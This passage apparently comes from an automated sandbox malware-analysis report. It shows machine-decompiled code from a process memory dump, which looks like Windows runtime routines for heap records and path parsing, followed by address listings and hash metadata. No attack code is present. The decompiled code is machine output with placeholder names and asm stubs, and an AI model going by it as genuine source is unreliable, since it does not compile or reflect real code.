												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01696DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0169F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0169F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0169F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0169FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0169FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0169F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0169F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01724CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E016AD130(_t427, _t494, _t511);
				}
			}










































































                                                      0x01725ba5
                                                      0x01725baa
                                                      0x01725baf
                                                      0x01725bb4
                                                      0x01725bb6
                                                      0x01725bbc
                                                      0x01725bbe
                                                      0x01725bc4
                                                      0x01725bcd
                                                      0x01725bd3
                                                      0x01725bd6
                                                      0x01725bdc
                                                      0x01725be0
                                                      0x01725be3
                                                      0x01725beb
                                                      0x01725bf2
                                                      0x01725bf8
                                                      0x01725bfe
                                                      0x01725c04
                                                      0x01725c0e
                                                      0x01725c18
                                                      0x01725c1f
                                                      0x01725c25
                                                      0x01725c2a
                                                      0x01725c2c
                                                      0x01725c32
                                                      0x01725c3a
                                                      0x01725c3f
                                                      0x01725c42
                                                      0x01725c48
                                                      0x01725c5b
                                                      0x01725c5b
                                                      0x01725c2c
                                                      0x01725cb7
                                                      0x01725cb9
                                                      0x01725cbf
                                                      0x01725cc2
                                                      0x01725cca
                                                      0x01725ccb
                                                      0x01725ccb
                                                      0x01725cd1
                                                      0x01725cd7
                                                      0x01725cda
                                                      0x01725ce1
                                                      0x01725ce4
                                                      0x01725ce7
                                                      0x01725ced
                                                      0x01725cf3
                                                      0x01725cf9
                                                      0x01725cff
                                                      0x01725d08
                                                      0x01725d0a
                                                      0x01725d0e
                                                      0x01725d10
                                                      0x00000000
                                                      0x00000000
                                                      0x01725d16
                                                      0x01725d1a
                                                      0x00000000
                                                      0x00000000
                                                      0x01725d20
                                                      0x01725d22
                                                      0x01725d25
                                                      0x01725d2f
                                                      0x01725d2f
                                                      0x01725d33
                                                      0x01725d3d
                                                      0x01725d49
                                                      0x01725d4b
                                                      0x00000000
                                                      0x00000000
                                                      0x01725d5a
                                                      0x01725d5d
                                                      0x01725d60
                                                      0x00000000
                                                      0x00000000
                                                      0x01725d66
                                                      0x01725d69
                                                      0x00000000
                                                      0x00000000
                                                      0x01725d6f
                                                      0x01725d6f
                                                      0x01725d73
                                                      0x01725d79
                                                      0x01725d7f
                                                      0x01725d86
                                                      0x01725d95
                                                      0x01725d98
                                                      0x01725dba
                                                      0x01725dcb
                                                      0x01725dce
                                                      0x01725dd3
                                                      0x01725dd6
                                                      0x01725dd8
                                                      0x01725de6
                                                      0x01725dec
                                                      0x01725dee
                                                      0x01725df1
                                                      0x01725df3
                                                      0x0172635a
                                                      0x0172635a
                                                      0x00000000
                                                      0x0172635a
                                                      0x01725dfe
                                                      0x01725e02
                                                      0x01725e05
                                                      0x01725e07
                                                      0x01725e10
                                                      0x01725e13
                                                      0x01725e1b
                                                      0x01725e1c
                                                      0x01725e21
                                                      0x01725e22
                                                      0x01725e23
                                                      0x01725e25
                                                      0x01725e2a
                                                      0x01725e2c
                                                      0x01725e2e
                                                      0x01725e36
                                                      0x01725e39
                                                      0x01725e42
                                                      0x01725e47
                                                      0x01725e4d
                                                      0x01725e54
                                                      0x01725e54
                                                      0x01725e54
                                                      0x01725e2e
                                                      0x01725e5c
                                                      0x01725e5f
                                                      0x01725e62
                                                      0x01725e64
                                                      0x01725e6b
                                                      0x01725e70
                                                      0x01725e7a
                                                      0x01725e7a
                                                      0x01725e7a
                                                      0x01725e6b
                                                      0x01725e7e
                                                      0x01725e7f
                                                      0x01725e7f
                                                      0x01725e81
                                                      0x01725e87
                                                      0x01725e8b
                                                      0x01725e8c
                                                      0x01725e8c
                                                      0x01725e8c
                                                      0x01725e9a
                                                      0x01725e9c
                                                      0x01725ea2
                                                      0x01725ea6
                                                      0x01725f50
                                                      0x01725f50
                                                      0x01725f57
                                                      0x01725f66
                                                      0x01725f66
                                                      0x01725f66
                                                      0x01725f68
                                                      0x01725f6a
                                                      0x017263d0
                                                      0x00000000
                                                      0x01725f70
                                                      0x01725f70
                                                      0x01725f91
                                                      0x01725f9c
                                                      0x01725f9e
                                                      0x01725fa4
                                                      0x01725fa6
                                                      0x0172638c
                                                      0x01726392
                                                      0x017263a1
                                                      0x017263a7
                                                      0x017263af
                                                      0x017263af
                                                      0x017263bd
                                                      0x017263d8
                                                      0x00000000
                                                      0x017263d8
                                                      0x01725fac
                                                      0x01725fb2
                                                      0x01725fb4
                                                      0x01725fbd
                                                      0x01725fc6
                                                      0x01725fce
                                                      0x01725fd4
                                                      0x01725fdc
                                                      0x01725fec
                                                      0x01725fed
                                                      0x01725fee
                                                      0x01725fef
                                                      0x01725ff9
                                                      0x01725ffa
                                                      0x01725ffb
                                                      0x01725ffc
                                                      0x01726000
                                                      0x01726004
                                                      0x01726012
                                                      0x01726012
                                                      0x01726018
                                                      0x01726019
                                                      0x0172601a
                                                      0x0172601b
                                                      0x0172601c
                                                      0x01726020
                                                      0x01726059
                                                      0x0172605c
                                                      0x01726061
                                                      0x01726061
                                                      0x01726022
                                                      0x01726022
                                                      0x01726022
                                                      0x01726025
                                                      0x0172602a
                                                      0x0172602b
                                                      0x01726031
                                                      0x01726037
                                                      0x01726038
                                                      0x0172603e
                                                      0x01726048
                                                      0x01726049
                                                      0x0172604a
                                                      0x0172604b
                                                      0x0172604c
                                                      0x0172604d
                                                      0x01726053
                                                      0x01726054
                                                      0x01726054
                                                      0x01726062
                                                      0x01726065
                                                      0x01726067
                                                      0x0172606a
                                                      0x01726070
                                                      0x01726075
                                                      0x01726076
                                                      0x01726081
                                                      0x01726087
                                                      0x01726095
                                                      0x01726099
                                                      0x0172609e
                                                      0x017260a4
                                                      0x017260ae
                                                      0x017260b0
                                                      0x017260b3
                                                      0x017260b6
                                                      0x017260b8
                                                      0x017260ba
                                                      0x017260ba
                                                      0x017260ba
                                                      0x017260ba
                                                      0x017260be
                                                      0x017260c0
                                                      0x017260c5
                                                      0x017260c5
                                                      0x017260c5
                                                      0x017260c6
                                                      0x017260cd
                                                      0x01726114
                                                      0x017260cf
                                                      0x017260cf
                                                      0x017260d4
                                                      0x017260d5
                                                      0x017260da
                                                      0x017260db
                                                      0x017260e1
                                                      0x017260e2
                                                      0x017260e8
                                                      0x017260f8
                                                      0x017260fd
                                                      0x017260fe
                                                      0x01726102
                                                      0x01726104
                                                      0x01726107
                                                      0x01726109
                                                      0x0172610b
                                                      0x0172610b
                                                      0x0172610b
                                                      0x0172610b
                                                      0x0172610f
                                                      0x0172610f
                                                      0x01726117
                                                      0x0172611a
                                                      0x0172611f
                                                      0x01726125
                                                      0x01726134
                                                      0x01726139
                                                      0x0172613f
                                                      0x01726146
                                                      0x01726148
                                                      0x0172614b
                                                      0x0172614d
                                                      0x0172614f
                                                      0x0172614f
                                                      0x0172614f
                                                      0x0172614f
                                                      0x01726153
                                                      0x01726159
                                                      0x01726159
                                                      0x0172615c
                                                      0x01726163
                                                      0x01726169
                                                      0x0172616c
                                                      0x01726172
                                                      0x01726181
                                                      0x01726186
                                                      0x01726187
                                                      0x0172618b
                                                      0x01726191
                                                      0x01726195
                                                      0x017261a3
                                                      0x017261bb
                                                      0x017261c0
                                                      0x017261c3
                                                      0x017261cc
                                                      0x017261d0
                                                      0x017261dc
                                                      0x017261de
                                                      0x017261e1
                                                      0x017261e4
                                                      0x017261e6
                                                      0x017261e8
                                                      0x017261e8
                                                      0x017261e8
                                                      0x017261e8
                                                      0x017261e6
                                                      0x017261ec
                                                      0x017261f3
                                                      0x01726203
                                                      0x01726209
                                                      0x0172620a
                                                      0x01726216
                                                      0x0172621d
                                                      0x01726227
                                                      0x01726241
                                                      0x01726246
                                                      0x0172624c
                                                      0x01726257
                                                      0x01726259
                                                      0x0172625c
                                                      0x0172625e
                                                      0x01726260
                                                      0x01726260
                                                      0x01726260
                                                      0x01726260
                                                      0x0172625e
                                                      0x01726264
                                                      0x01726267
                                                      0x01726269
                                                      0x01726315
                                                      0x01726315
                                                      0x0172631b
                                                      0x0172631e
                                                      0x01726324
                                                      0x01726327
                                                      0x0172632f
                                                      0x01726330
                                                      0x01726333
                                                      0x0172633a
                                                      0x0172633c
                                                      0x01726335
                                                      0x01726335
                                                      0x01726335
                                                      0x0172633f
                                                      0x01726342
                                                      0x0172634c
                                                      0x01726352
                                                      0x01726355
                                                      0x01726355
                                                      0x01726359
                                                      0x00000000
                                                      0x0172626f
                                                      0x01726275
                                                      0x01726275
                                                      0x01726278
                                                      0x0172627e
                                                      0x0172627e
                                                      0x01726281
                                                      0x01726287
                                                      0x0172628d
                                                      0x01726298
                                                      0x0172629c
                                                      0x017262a2
                                                      0x0172629e
                                                      0x0172629e
                                                      0x0172629e
                                                      0x017262a7
                                                      0x017262a7
                                                      0x017262aa
                                                      0x017262b0
                                                      0x017262f0
                                                      0x017262f0
                                                      0x017262f2
                                                      0x017262f8
                                                      0x017262fd
                                                      0x017262b2
                                                      0x017262b2
                                                      0x017262b2
                                                      0x017262b5
                                                      0x017262dd
                                                      0x017262e2
                                                      0x017262e5
                                                      0x017262b7
                                                      0x017262b8
                                                      0x017262bb
                                                      0x017262bd
                                                      0x017262c0
                                                      0x017262c4
                                                      0x017262cd
                                                      0x017262cd
                                                      0x017262c0
                                                      0x017262bb
                                                      0x017262b5
                                                      0x01726302
                                                      0x01726303
                                                      0x01726305
                                                      0x01726305
                                                      0x01726305
                                                      0x0172630c
                                                      0x0172630c
                                                      0x00000000
                                                      0x0172627e
                                                      0x01726269
                                                      0x01725eac
                                                      0x01725ebb
                                                      0x01725ebe
                                                      0x01725ecb
                                                      0x01725ecb
                                                      0x01725ece
                                                      0x01725ece
                                                      0x01725ed4
                                                      0x01725ed7
                                                      0x01725ed9
                                                      0x01725edb
                                                      0x01725edb
                                                      0x01725ee1
                                                      0x01725ee1
                                                      0x01725ee3
                                                      0x01725f20
                                                      0x01725f20
                                                      0x01725ee5
                                                      0x01725ee5
                                                      0x01725ee5
                                                      0x01725ee8
                                                      0x01725f11
                                                      0x01725f18
                                                      0x01725eea
                                                      0x01725eea
                                                      0x01725eed
                                                      0x01725ef2
                                                      0x01725ef8
                                                      0x01725efb
                                                      0x01725f0a
                                                      0x01725f0a
                                                      0x01725eed
                                                      0x01725ee8
                                                      0x01725f22
                                                      0x01725f28
                                                      0x00000000
                                                      0x00000000
                                                      0x01725f30
                                                      0x01725f31
                                                      0x01725f37
                                                      0x01725f3a
                                                      0x01725f3d
                                                      0x01725f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01725f46
                                                      0x01725f48
                                                      0x01725f4d
                                                      0x00000000
                                                      0x01725f4d
                                                      0x01725dda
                                                      0x01725ddf
                                                      0x00000000
                                                      0x01725ddf
                                                      0x01725dd8
                                                      0x01725da7
                                                      0x01725da9
                                                      0x01725dac
                                                      0x01725dae
                                                      0x00000000
                                                      0x01725db4
                                                      0x01725db4
                                                      0x00000000
                                                      0x01725db4
                                                      0x01725dae
                                                      0x01725d88
                                                      0x01725d8d
                                                      0x01726363
                                                      0x01726369
                                                      0x0172636a
                                                      0x01726370
                                                      0x01726372
                                                      0x0172637a
                                                      0x0172637b
                                                      0x0172637d
                                                      0x00000000
                                                      0x00000000
                                                      0x0172637f
                                                      0x01726385
                                                      0x00000000
                                                      0x01726385
                                                      0x01725d38
                                                      0x01725d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01725d3b
                                                      0x01725d27
                                                      0x01725d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01726360
                                                      0x00000000
                                                      0x01726360
                                                      0x01725c10
                                                      0x01725c10
                                                      0x017263da
                                                      0x017263e5
                                                      0x017263e5

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 787e2197a8c4a132b47420e1d0e23d3a126b9bda18f9ea73a9b6c89cd9a8c06c
                                                      • Instruction ID: cd51a4fa4693eae2e219f5acc6430c4e707da127688193933b1af5a51d7d7d29
                                                      • Opcode Fuzzy Hash: 787e2197a8c4a132b47420e1d0e23d3a126b9bda18f9ea73a9b6c89cd9a8c06c
                                                      • Instruction Fuzzy Hash: 63422975900269CFDB24CF68C880BA9FBB1FF49314F1581AAE94DEB242D7749986CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01674120, Relevance: .4, Instructions: 444COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E01674120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x174d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0168F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01676E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01674620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01676E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
